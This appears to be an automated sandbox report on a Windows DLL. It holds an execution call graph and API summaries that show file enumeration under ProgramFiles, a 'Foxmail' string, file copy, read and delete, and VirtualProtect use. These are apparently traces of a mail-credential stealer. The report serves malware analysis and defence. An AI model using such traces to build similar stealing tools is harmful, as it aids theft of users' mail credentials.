                                                                                                                                                execution_graph 6731 10007a80 6732 10007a8d 6731->6732 6733 1000637b __dosmaperr 20 API calls 6732->6733 6734 10007aa7 6733->6734 6735 1000571e _free 20 API calls 6734->6735 6736 10007ab3 6735->6736 6737 1000637b __dosmaperr 20 API calls 6736->6737 6741 10007ad9 6736->6741 6738 10007acd 6737->6738 6740 1000571e _free 20 API calls 6738->6740 6739 10005eb7 11 API calls 6739->6741 6740->6741 6741->6739 6742 10007ae5 6741->6742 7171 10007103 GetCommandLineA GetCommandLineW 7172 10005303 7175 100050a5 7172->7175 7184 1000502f 7175->7184 7178 1000502f 5 API calls 7179 100050c3 7178->7179 7180 10005000 20 API calls 7179->7180 7181 100050ce 7180->7181 7182 10005000 20 API calls 7181->7182 7183 100050d9 7182->7183 7185 10005048 7184->7185 7186 10002ada _ValidateLocalCookies 5 API calls 7185->7186 7187 10005069 7186->7187 7187->7178 6743 10009c88 6744 10009c95 6743->6744 6745 10009ca9 6744->6745 6750 10009ccd 6744->6750 6754 10009cc0 6744->6754 6746 10009cb0 6745->6746 6747 10009cc4 6745->6747 6749 10006368 __dosmaperr 20 API calls 6746->6749 6748 10006332 __dosmaperr 20 API calls 6747->6748 6748->6754 6752 10009cb5 6749->6752 6753 10006368 __dosmaperr 20 API calls 6750->6753 6750->6754 6751 10002ada _ValidateLocalCookies 5 API calls 6755 10009d15 6751->6755 6756 10006355 __dosmaperr 20 API calls 6752->6756 6757 10009cf2 6753->6757 6754->6751 6756->6754 6758 10006355 __dosmaperr 20 API calls 6757->6758 6758->6754 6759 10008a89 6762 10006d60 6759->6762 6763 10006d69 6762->6763 6764 10006d72 6762->6764 6766 10006c5f 6763->6766 6767 10005af6 _abort 38 API calls 6766->6767 6768 10006c6c 6767->6768 6769 10006d7e 38 API calls 6768->6769 6770 10006c74 6769->6770 6786 100069f3 6770->6786 6773 10006c8b 6773->6764 6778 1000571e _free 20 API calls 6778->6773 6779 10006cc9 6780 10006368 __dosmaperr 20 API calls 6779->6780 6785 10006cce 
6780->6785 6781 10006d12 6781->6785 6810 100068c9 6781->6810 6782 10006ce6 6782->6781 6783 1000571e _free 20 API calls 6782->6783 6783->6781 6785->6778 6787 100054a7 38 API calls 6786->6787 6788 10006a05 6787->6788 6789 10006a14 GetOEMCP 6788->6789 6790 10006a26 6788->6790 6792 10006a3d 6789->6792 6791 10006a2b GetACP 6790->6791 6790->6792 6791->6792 6792->6773 6793 100056d0 6792->6793 6794 1000570e 6793->6794 6798 100056de __dosmaperr 6793->6798 6795 10006368 __dosmaperr 20 API calls 6794->6795 6797 1000570c 6795->6797 6796 100056f9 RtlAllocateHeap 6796->6797 6796->6798 6797->6785 6800 10006e20 6797->6800 6798->6794 6798->6796 6799 1000474f __dosmaperr 7 API calls 6798->6799 6799->6798 6801 100069f3 40 API calls 6800->6801 6802 10006e3f 6801->6802 6805 10006e90 IsValidCodePage 6802->6805 6807 10006e46 6802->6807 6809 10006eb5 ___scrt_fastfail 6802->6809 6803 10002ada _ValidateLocalCookies 5 API calls 6804 10006cc1 6803->6804 6804->6779 6804->6782 6806 10006ea2 GetCPInfo 6805->6806 6805->6807 6806->6807 6806->6809 6807->6803 6813 10006acb GetCPInfo 6809->6813 6886 10006886 6810->6886 6812 100068ed 6812->6785 6814 10006baf 6813->6814 6816 10006b05 6813->6816 6818 10002ada _ValidateLocalCookies 5 API calls 6814->6818 6823 100086e4 6816->6823 6820 10006c5b 6818->6820 6820->6807 6822 10008a3e 43 API calls 6822->6814 6824 100054a7 38 API calls 6823->6824 6825 10008704 MultiByteToWideChar 6824->6825 6827 10008742 6825->6827 6828 100087da 6825->6828 6831 100056d0 21 API calls 6827->6831 6834 10008763 ___scrt_fastfail 6827->6834 6829 10002ada _ValidateLocalCookies 5 API calls 6828->6829 6832 10006b66 6829->6832 6830 100087d4 6842 10008801 6830->6842 6831->6834 6837 10008a3e 6832->6837 6834->6830 6835 100087a8 MultiByteToWideChar 6834->6835 6835->6830 6836 100087c4 GetStringTypeW 6835->6836 6836->6830 6838 100054a7 38 API calls 6837->6838 6839 10008a51 6838->6839 6846 10008821 6839->6846 6843 1000880d 6842->6843 6844 1000881e 6842->6844 6843->6844 6845 1000571e _free 20 API 
calls 6843->6845 6844->6828 6845->6844 6848 1000883c 6846->6848 6847 10008862 MultiByteToWideChar 6849 10008a16 6847->6849 6850 1000888c 6847->6850 6848->6847 6851 10002ada _ValidateLocalCookies 5 API calls 6849->6851 6855 100056d0 21 API calls 6850->6855 6857 100088ad 6850->6857 6852 10006b87 6851->6852 6852->6822 6853 100088f6 MultiByteToWideChar 6854 10008962 6853->6854 6856 1000890f 6853->6856 6859 10008801 __freea 20 API calls 6854->6859 6855->6857 6873 10005f19 6856->6873 6857->6853 6857->6854 6859->6849 6861 10008971 6863 100056d0 21 API calls 6861->6863 6867 10008992 6861->6867 6862 10008939 6862->6854 6864 10005f19 11 API calls 6862->6864 6863->6867 6864->6854 6865 10008a07 6866 10008801 __freea 20 API calls 6865->6866 6866->6854 6867->6865 6868 10005f19 11 API calls 6867->6868 6869 100089e6 6868->6869 6869->6865 6870 100089f5 WideCharToMultiByte 6869->6870 6870->6865 6871 10008a35 6870->6871 6872 10008801 __freea 20 API calls 6871->6872 6872->6854 6874 10005c45 __dosmaperr 5 API calls 6873->6874 6875 10005f40 6874->6875 6878 10005f49 6875->6878 6881 10005fa1 6875->6881 6879 10002ada _ValidateLocalCookies 5 API calls 6878->6879 6880 10005f9b 6879->6880 6880->6854 6880->6861 6880->6862 6882 10005c45 __dosmaperr 5 API calls 6881->6882 6883 10005fc8 6882->6883 6884 10002ada _ValidateLocalCookies 5 API calls 6883->6884 6885 10005f89 LCMapStringW 6884->6885 6885->6878 6887 10006892 ___scrt_is_nonwritable_in_current_image 6886->6887 6894 10005671 RtlEnterCriticalSection 6887->6894 6889 1000689c 6895 100068f1 6889->6895 6893 100068b5 _abort 6893->6812 6894->6889 6907 10007011 6895->6907 6897 1000693f 6898 10007011 26 API calls 6897->6898 6899 1000695b 6898->6899 6900 10007011 26 API calls 6899->6900 6901 10006979 6900->6901 6902 100068a9 6901->6902 6903 1000571e _free 20 API calls 6901->6903 6904 100068bd 6902->6904 6903->6902 6921 100056b9 RtlLeaveCriticalSection 6904->6921 6906 100068c7 6906->6893 6908 10007022 6907->6908 6917 1000701e 6907->6917 6909 10007029 
6908->6909 6913 1000703c ___scrt_fastfail 6908->6913 6910 10006368 __dosmaperr 20 API calls 6909->6910 6911 1000702e 6910->6911 6912 100062ac ___std_exception_copy 26 API calls 6911->6912 6912->6917 6914 10007073 6913->6914 6915 1000706a 6913->6915 6913->6917 6914->6917 6919 10006368 __dosmaperr 20 API calls 6914->6919 6916 10006368 __dosmaperr 20 API calls 6915->6916 6918 1000706f 6916->6918 6917->6897 6920 100062ac ___std_exception_copy 26 API calls 6918->6920 6919->6918 6920->6917 6921->6906 6922 1000508a 6923 100050a2 6922->6923 6924 1000509c 6922->6924 6925 10005000 20 API calls 6924->6925 6925->6923 6021 1000220c 6022 10002215 6021->6022 6023 1000221a dllmain_dispatch 6021->6023 6025 100022b1 6022->6025 6026 100022c7 6025->6026 6028 100022d0 6026->6028 6029 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6026->6029 6028->6023 6029->6028 6926 10003c90 RtlUnwind 6030 10002418 6031 10002420 ___scrt_release_startup_lock 6030->6031 6034 100047f5 6031->6034 6033 10002448 6035 10004804 6034->6035 6036 10004808 6034->6036 6035->6033 6039 10004815 6036->6039 6040 10005b7a __dosmaperr 20 API calls 6039->6040 6043 1000482c 6040->6043 6041 10002ada _ValidateLocalCookies 5 API calls 6042 10004811 6041->6042 6042->6033 6043->6041 6927 10004a9a 6930 10005411 6927->6930 6931 1000541d _abort 6930->6931 6932 10005af6 _abort 38 API calls 6931->6932 6935 10005422 6932->6935 6933 100055a8 _abort 38 API calls 6934 1000544c 6933->6934 6935->6933 7579 1000679a 7580 100067a4 7579->7580 7581 100067b4 7580->7581 7583 1000571e _free 20 API calls 7580->7583 7582 1000571e _free 20 API calls 7581->7582 7584 100067bb 7582->7584 7583->7580 6044 1000281c 6047 10002882 6044->6047 6050 10003550 6047->6050 6049 1000282a 6051 1000355d 6050->6051 6054 1000358a 6050->6054 6052 100047e5 ___std_exception_copy 21 API calls 6051->6052 6051->6054 6053 1000357a 6052->6053 6053->6054 6056 1000544d 6053->6056 6054->6049 6057 1000545a 6056->6057 6058 10005468 
6056->6058 6057->6058 6063 1000547f 6057->6063 6059 10006368 __dosmaperr 20 API calls 6058->6059 6060 10005470 6059->6060 6065 100062ac 6060->6065 6062 1000547a 6062->6054 6063->6062 6064 10006368 __dosmaperr 20 API calls 6063->6064 6064->6060 6068 10006231 6065->6068 6067 100062b8 6067->6062 6069 10005b7a __dosmaperr 20 API calls 6068->6069 6070 10006247 6069->6070 6071 100062a6 6070->6071 6075 10006255 6070->6075 6079 100062bc IsProcessorFeaturePresent 6071->6079 6073 100062ab 6074 10006231 ___std_exception_copy 26 API calls 6073->6074 6076 100062b8 6074->6076 6077 10002ada _ValidateLocalCookies 5 API calls 6075->6077 6076->6067 6078 1000627c 6077->6078 6078->6067 6080 100062c7 6079->6080 6083 100060e2 6080->6083 6084 100060fe ___scrt_fastfail 6083->6084 6085 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6084->6085 6087 100061fb ___scrt_fastfail 6085->6087 6086 10002ada _ValidateLocalCookies 5 API calls 6088 10006219 GetCurrentProcess TerminateProcess 6086->6088 6087->6086 6088->6073 7588 100021a1 ___scrt_dllmain_exception_filter 6089 10009c23 6090 10009c56 6089->6090 6091 10009c28 6089->6091 6127 10009728 6090->6127 6092 10009c46 6091->6092 6093 10009c2d 6091->6093 6119 100098f5 6092->6119 6095 10009ccd 6093->6095 6112 10009807 6093->6112 6098 10006368 __dosmaperr 20 API calls 6095->6098 6103 10009cc0 6095->6103 6100 10009cf2 6098->6100 6099 10009bf2 6099->6095 6102 10009ca9 6099->6102 6099->6103 6101 10006355 __dosmaperr 20 API calls 6100->6101 6101->6103 6105 10009cb0 6102->6105 6106 10009cc4 6102->6106 6104 10002ada _ValidateLocalCookies 5 API calls 6103->6104 6107 10009d15 6104->6107 6109 10006368 __dosmaperr 20 API calls 6105->6109 6137 10006332 6106->6137 6110 10009cb5 6109->6110 6134 10006355 6110->6134 6114 10009816 6112->6114 6113 100098d8 6116 10002ada _ValidateLocalCookies 5 API calls 6113->6116 6114->6113 6115 10009894 WriteFile 6114->6115 6115->6114 6117 100098da GetLastError 6115->6117 6118 100098f1 6116->6118 
6117->6113 6118->6099 6120 10009904 6119->6120 6121 10009a0f 6120->6121 6124 10009986 WideCharToMultiByte 6120->6124 6126 100099bb WriteFile 6120->6126 6122 10002ada _ValidateLocalCookies 5 API calls 6121->6122 6123 10009a1e 6122->6123 6123->6099 6125 10009a07 GetLastError 6124->6125 6124->6126 6125->6121 6126->6120 6126->6125 6132 10009737 6127->6132 6128 100097ea 6129 10002ada _ValidateLocalCookies 5 API calls 6128->6129 6131 10009803 6129->6131 6130 100097a9 WriteFile 6130->6132 6133 100097ec GetLastError 6130->6133 6131->6099 6132->6128 6132->6130 6133->6128 6135 10005b7a __dosmaperr 20 API calls 6134->6135 6136 1000635a 6135->6136 6136->6103 6138 10006355 __dosmaperr 20 API calls 6137->6138 6139 1000633d __dosmaperr 6138->6139 6140 10006368 __dosmaperr 20 API calls 6139->6140 6141 10006350 6140->6141 6141->6103 5763 1000c7a7 5764 1000c7be 5763->5764 5770 1000c82c 5763->5770 5764->5770 5775 1000c7e6 GetModuleHandleA 5764->5775 5766 1000c835 GetModuleHandleA 5769 1000c83f 5766->5769 5767 1000c872 5768 1000c7dd 5768->5769 5768->5770 5772 1000c800 GetProcAddress 5768->5772 5769->5770 5771 1000c85f GetProcAddress 5769->5771 5770->5766 5770->5767 5770->5769 5771->5770 5772->5770 5773 1000c80d VirtualProtect 5772->5773 5773->5770 5774 1000c81c VirtualProtect 5773->5774 5774->5770 5776 1000c82c 5775->5776 5777 1000c7ef 5775->5777 5780 1000c872 5776->5780 5781 1000c835 GetModuleHandleA 5776->5781 5785 1000c83f 5776->5785 5787 1000c803 GetProcAddress 5777->5787 5779 1000c7f4 5779->5776 5782 1000c800 GetProcAddress 5779->5782 5781->5785 5782->5776 5783 1000c80d VirtualProtect 5782->5783 5783->5776 5784 1000c81c VirtualProtect 5783->5784 5784->5776 5785->5776 5786 1000c85f GetProcAddress 5785->5786 5786->5776 5788 1000c82c 5787->5788 5789 1000c80d VirtualProtect 5787->5789 5791 1000c872 5788->5791 5792 1000c835 GetModuleHandleA 5788->5792 5789->5788 5790 1000c81c VirtualProtect 5789->5790 5790->5788 5794 1000c83f 5792->5794 5793 1000c85f GetProcAddress 5793->5794 
5794->5788 5794->5793 7589 10009fa7 7590 10006368 __dosmaperr 20 API calls 7589->7590 7591 10009fac 7590->7591 6142 1000742b 6143 10007430 6142->6143 6144 10007453 6143->6144 6146 10008bae 6143->6146 6147 10008bdd 6146->6147 6148 10008bbb 6146->6148 6147->6143 6149 10008bd7 6148->6149 6150 10008bc9 RtlDeleteCriticalSection 6148->6150 6151 1000571e _free 20 API calls 6149->6151 6150->6149 6150->6150 6151->6147 6936 100060ac 6937 100060dd 6936->6937 6939 100060b7 6936->6939 6938 100060c7 FreeLibrary 6938->6939 6939->6937 6939->6938 6940 1000aeac 6941 1000aeb5 6940->6941 6942 10008cc1 21 API calls 6941->6942 6943 1000aebb 6942->6943 6944 1000aedd 6943->6944 6945 10006332 __dosmaperr 20 API calls 6943->6945 6945->6944 6152 10005630 6153 1000563b 6152->6153 6155 10005664 6153->6155 6156 10005660 6153->6156 6158 10005eb7 6153->6158 6165 10005688 6155->6165 6159 10005c45 __dosmaperr 5 API calls 6158->6159 6160 10005ede 6159->6160 6161 10005efc InitializeCriticalSectionAndSpinCount 6160->6161 6162 10005ee7 6160->6162 6161->6162 6163 10002ada _ValidateLocalCookies 5 API calls 6162->6163 6164 10005f13 6163->6164 6164->6153 6166 10005695 6165->6166 6168 100056b4 6165->6168 6167 1000569f RtlDeleteCriticalSection 6166->6167 6167->6167 6167->6168 6168->6156 6950 100096b2 6957 10008dbc 6950->6957 6952 100096c7 6953 100096c2 6953->6952 6954 10005af6 _abort 38 API calls 6953->6954 6955 100096ea 6954->6955 6955->6952 6956 10009708 GetConsoleMode 6955->6956 6956->6952 6958 10008dc9 6957->6958 6960 10008dd6 6957->6960 6959 10006368 __dosmaperr 20 API calls 6958->6959 6962 10008dce 6959->6962 6961 10006368 __dosmaperr 20 API calls 6960->6961 6963 10008de2 6960->6963 6964 10008e03 6961->6964 6962->6953 6963->6953 6965 100062ac ___std_exception_copy 26 API calls 6964->6965 6965->6962 6966 10003eb3 6967 10005411 38 API calls 6966->6967 6968 10003ebb 6967->6968 7192 10008b34 7193 1000637b __dosmaperr 20 API calls 7192->7193 7195 10008b46 7193->7195 7194 1000571e _free 20 API calls 7196 
10008ba5 7194->7196 7197 10005eb7 11 API calls 7195->7197 7198 10008b53 7195->7198 7197->7195 7198->7194 7199 10009b3c 7200 10006355 __dosmaperr 20 API calls 7199->7200 7201 10009b44 7200->7201 7202 10006368 __dosmaperr 20 API calls 7201->7202 7203 10009b4b 7202->7203 7204 100062ac ___std_exception_copy 26 API calls 7203->7204 7205 10009b56 7204->7205 7206 10002ada _ValidateLocalCookies 5 API calls 7205->7206 7207 10009d15 7206->7207 6169 1000543d 6170 10005440 6169->6170 6173 100055a8 6170->6173 6184 10007613 6173->6184 6177 100055c2 IsProcessorFeaturePresent 6181 100055cd 6177->6181 6178 100055e0 6214 10004bc1 6178->6214 6180 100055b8 6180->6177 6180->6178 6183 100060e2 _abort 8 API calls 6181->6183 6183->6178 6217 10007581 6184->6217 6187 1000766e 6188 1000767a _abort 6187->6188 6189 10005b7a __dosmaperr 20 API calls 6188->6189 6193 100076a7 _abort 6188->6193 6194 100076a1 _abort 6188->6194 6189->6194 6190 100076f3 6191 10006368 __dosmaperr 20 API calls 6190->6191 6192 100076f8 6191->6192 6195 100062ac ___std_exception_copy 26 API calls 6192->6195 6199 1000771f 6193->6199 6231 10005671 RtlEnterCriticalSection 6193->6231 6194->6190 6194->6193 6213 100076d6 6194->6213 6195->6213 6200 1000777e 6199->6200 6202 10007776 6199->6202 6210 100077a9 6199->6210 6232 100056b9 RtlLeaveCriticalSection 6199->6232 6200->6210 6233 10007665 6200->6233 6205 10004bc1 _abort 28 API calls 6202->6205 6205->6200 6209 10007665 _abort 38 API calls 6209->6210 6236 1000782e 6210->6236 6211 1000780c 6212 10005af6 _abort 38 API calls 6211->6212 6211->6213 6212->6213 6260 1000bdc9 6213->6260 6264 1000499b 6214->6264 6220 10007527 6217->6220 6219 100055ad 6219->6180 6219->6187 6221 10007533 ___scrt_is_nonwritable_in_current_image 6220->6221 6226 10005671 RtlEnterCriticalSection 6221->6226 6223 10007541 6227 10007575 6223->6227 6225 10007568 _abort 6225->6219 6226->6223 6230 100056b9 RtlLeaveCriticalSection 6227->6230 6229 1000757f 6229->6225 6230->6229 6231->6199 6232->6202 6234 10005af6 
_abort 38 API calls 6233->6234 6235 1000766a 6234->6235 6235->6209 6237 10007834 6236->6237 6239 100077fd 6236->6239 6263 100056b9 RtlLeaveCriticalSection 6237->6263 6239->6211 6239->6213 6240 10005af6 GetLastError 6239->6240 6241 10005b12 6240->6241 6242 10005b0c 6240->6242 6243 1000637b __dosmaperr 20 API calls 6241->6243 6246 10005b61 SetLastError 6241->6246 6244 10005e08 __dosmaperr 11 API calls 6242->6244 6245 10005b24 6243->6245 6244->6241 6247 10005b2c 6245->6247 6248 10005e5e __dosmaperr 11 API calls 6245->6248 6246->6211 6249 1000571e _free 20 API calls 6247->6249 6250 10005b41 6248->6250 6251 10005b32 6249->6251 6250->6247 6252 10005b48 6250->6252 6253 10005b6d SetLastError 6251->6253 6254 1000593c __dosmaperr 20 API calls 6252->6254 6255 100055a8 _abort 35 API calls 6253->6255 6256 10005b53 6254->6256 6257 10005b79 6255->6257 6258 1000571e _free 20 API calls 6256->6258 6259 10005b5a 6258->6259 6259->6246 6259->6253 6261 10002ada _ValidateLocalCookies 5 API calls 6260->6261 6262 1000bdd4 6261->6262 6262->6262 6263->6239 6265 100049a7 _abort 6264->6265 6266 100049bf 6265->6266 6286 10004af5 GetModuleHandleW 6265->6286 6295 10005671 RtlEnterCriticalSection 6266->6295 6270 10004a65 6303 10004aa5 6270->6303 6274 10004a3c 6275 10004a54 6274->6275 6299 10004669 6274->6299 6281 10004669 _abort 5 API calls 6275->6281 6276 100049c7 6276->6270 6276->6274 6296 1000527a 6276->6296 6277 10004a82 6306 10004ab4 6277->6306 6278 10004aae 6279 1000bdc9 _abort 5 API calls 6278->6279 6284 10004ab3 6279->6284 6281->6270 6287 100049b3 6286->6287 6287->6266 6288 10004b39 GetModuleHandleExW 6287->6288 6289 10004b63 GetProcAddress 6288->6289 6290 10004b78 6288->6290 6289->6290 6291 10004b95 6290->6291 6292 10004b8c FreeLibrary 6290->6292 6293 10002ada _ValidateLocalCookies 5 API calls 6291->6293 6292->6291 6294 10004b9f 6293->6294 6294->6266 6295->6276 6314 10005132 6296->6314 6300 10004698 6299->6300 6301 10002ada _ValidateLocalCookies 5 API calls 6300->6301 6302 100046c1 
[Execution graph: call-graph edge list extracted from the rendered graph image. Node labels are function addresses of a module in the 0x10001000 to 0x1000b8xx range, annotated with the Windows API calls reached from each node; the numeric node ids and "->" edges carry no further information once the image is gone.]

Recoverable API calls, as labelled in the graph:
File and directory handling: GetEnvironmentVariableW, lstrlenW, lstrcatW, FindFirstFileW, FindNextFileW, FindClose, GetFileAttributesW, CopyFileW, CreateFileW, GetFileSize, ReadFile, DeleteFileW, CloseHandle, GetModuleFileNameA
Dynamic imports and thread-local storage: LoadLibraryExW, GetProcAddress, FreeLibrary, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetLastError, SetLastError
Process and exception handling: IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException, GetCurrentProcess, TerminateProcess, ExitProcess
CRT runtime support: RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, InitializeCriticalSectionAndSpinCount, RtlInitializeSListHead, RtlInterlockedFlushSList, GetProcessHeap, RtlAllocateHeap, HeapFree, GetStartupInfoW, GetStdHandle, SetStdHandle, GetFileType, GetConsoleCP, WriteConsoleW, WriteFile, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW

Most remaining edges connect CRT-internal routines (_abort, __dosmaperr, _free, ___scrt_fastfail, ___scrt_is_nonwritable_in_current_image, _ValidateLocalCookies, __startOneArgErrorHandling, __raise_exc, __CxxThrowException@8, dllmain_raw, dllmain_crt_process_attach, dllmain_crt_process_detach, try_get_function).
7754->7766 7757 100071ff ___scrt_fastfail 7755->7757 7757->7747 7760 10008aa3 7759->7760 7761 10008ab8 RtlSizeHeap 7759->7761 7762 10006368 __dosmaperr 20 API calls 7760->7762 7761->7754 7763 10008aa8 7762->7763 7764 100062ac ___std_exception_copy 26 API calls 7763->7764 7765 10008ab3 7764->7765 7765->7754 7767 10008ae3 7766->7767 7768 10008ad8 7766->7768 7769 10008aeb 7767->7769 7776 10008af4 __dosmaperr 7767->7776 7770 100056d0 21 API calls 7768->7770 7771 1000571e _free 20 API calls 7769->7771 7774 10008ae0 7770->7774 7771->7774 7772 10008af9 7775 10006368 __dosmaperr 20 API calls 7772->7775 7773 10008b1e RtlReAllocateHeap 7773->7774 7773->7776 7774->7757 7775->7774 7776->7772 7776->7773 7777 1000474f __dosmaperr 7 API calls 7776->7777 7777->7776 6695 10008c6e 6698 100056b9 RtlLeaveCriticalSection 6695->6698 6697 10008c79 6698->6697 6699 1000506f 6700 10005081 6699->6700 6702 10005087 6699->6702 6703 10005000 6700->6703 6704 1000502a 6703->6704 6705 1000500d 6703->6705 6704->6702 6706 10005024 6705->6706 6707 1000571e _free 20 API calls 6705->6707 6708 1000571e _free 20 API calls 6706->6708 6707->6705 6708->6704 7555 10003370 7566 10003330 7555->7566 7567 10003342 7566->7567 7568 1000334f 7566->7568 7569 10002ada _ValidateLocalCookies 5 API calls 7567->7569 7569->7568 6709 10009e71 6710 10009e95 6709->6710 6711 10009ee6 6710->6711 6714 10009f71 __startOneArgErrorHandling 6710->6714 6715 10009ef8 6711->6715 6717 1000aa53 6711->6717 6713 1000acad __startOneArgErrorHandling 6714->6713 6716 1000b2f0 21 API calls 6714->6716 6716->6713 6718 1000aa70 RtlDecodePointer 6717->6718 6720 1000aa80 6717->6720 6718->6720 6719 10002ada _ValidateLocalCookies 5 API calls 6722 1000ac67 6719->6722 6721 1000ab0d 6720->6721 6723 1000ab02 6720->6723 6725 1000aab7 6720->6725 6721->6723 6724 10006368 __dosmaperr 20 API calls 6721->6724 6722->6715 6723->6719 6724->6723 6725->6723 6726 10006368 __dosmaperr 20 API calls 6725->6726 6726->6723 6727 10008c72 6728 10008c79 6727->6728 6730 
100056b9 RtlLeaveCriticalSection 6727->6730 6730->6728 7782 10005bff 7790 10005d5c 7782->7790 7785 10005b7a __dosmaperr 20 API calls 7786 10005c1b 7785->7786 7787 10005c28 7786->7787 7788 10005c2b 11 API calls 7786->7788 7789 10005c13 7788->7789 7791 10005c45 __dosmaperr 5 API calls 7790->7791 7792 10005d83 7791->7792 7793 10005d9b TlsAlloc 7792->7793 7794 10005d8c 7792->7794 7793->7794 7795 10002ada _ValidateLocalCookies 5 API calls 7794->7795 7796 10005c09 7795->7796 7796->7785 7796->7789

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
